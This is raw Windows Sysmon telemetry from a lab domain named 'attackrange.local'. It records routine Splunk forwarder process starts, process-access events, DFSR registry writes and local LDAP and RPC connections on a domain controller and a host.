16:29:19.762{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061076Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.762{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061075Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.762{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-51DF-6063-2101-00000000AF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061074Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.762{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51DF-6063-2101-00000000AF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061073Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.764{7F8C56E7-51DF-6063-2101-00000000AF01}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000001061072Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:29:19.574{7F8C56E7-4E4C-6063-3100-00000000AF01}2384C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\69825A4F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_69825A4F-0000-0000-0000-100000000000.XML 13241300x80000000000000001061071Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:29:19.574{7F8C56E7-4E4C-6063-3100-00000000AF01}2384C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9B4FA6AE-056A-44AB-97FC-CFEC364D228F\Config SourceDWORD (0x00000001) 13241300x80000000000000001061070Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-SetValue2021-03-30 16:29:19.574{7F8C56E7-4E4C-6063-3100-00000000AF01}2384C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\9B4FA6AE-056A-44AB-97FC-CFEC364D228F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_9B4FA6AE-056A-44AB-97FC-CFEC364D228F.XML 10341000x80000000000000001061069Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51DF-6063-2001-00000000AF01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061068Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061067Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061066Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061065Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061064Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-51DF-6063-2001-00000000AF01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061063Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51DF-6063-2001-00000000AF01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061062Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.076{7F8C56E7-51DF-6063-2001-00000000AF01}2620C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061061Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.074{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B73E6A3D200944BDEAF97CF9F46108F,SHA256=8EBF510F4C9CB4389C4E0CBD54277AA882F18D8E64E6A8816590F9AD6EF1D7F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000245783Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:19.989{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3FCB1B39952E08E1F064F9D9FA1D49C,SHA256=A6ED6F89CCD6F86D625E9B3E44D484324A9F5598AFC1673BD43F39BF768AA06B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061096Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:18.415{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54802-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 354300x80000000000000001061095Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:18.415{7F8C56E7-4E4C-6063-3100-00000000AF01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54802-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local389ldap 354300x80000000000000001061094Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:18.403{7F8C56E7-4E3C-6063-0D00-00000000AF01}892C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54801-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local135epmap 354300x80000000000000001061093Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:18.403{7F8C56E7-4E4C-6063-3100-00000000AF01}2384C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local54801-truefe80:0:0:0:1d65:2de2:d417:1a1fwin-dc-877.attackrange.local135epmap 23542300x80000000000000001061092Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E956CB46A32CD7AE2213D4111FAC9D68,SHA256=AFA2448AAD8865E05306E830E9570EFE8FD1CDDF2373E2CEEF2FA6BFC61B0061,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061091Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-51E0-6063-2201-00000000AF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061090Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061089Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061088Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061087Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E3C-6063-0C00-00000000AF01}832860C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061086Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E3A-6063-0500-00000000AF01}412528C:\Windows\system32\csrss.exe{7F8C56E7-51E0-6063-2201-00000000AF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061085Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.434{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-51E0-6063-2201-00000000AF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061084Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:20.435{7F8C56E7-51E0-6063-2201-00000000AF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001061083Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:17.856{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54800-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001061082Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:17.856{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54800-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 23542300x8000000000000000245800Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.990{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=763C0533D9B0B682F4591D68CA40AD71,SHA256=132E30C90B7F46A4645761A0FE556B6426571449F9382D8F7D1EB0AF08376E8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000245799Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:20.974{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51E0-6063-B122-00000000AF01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245798Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 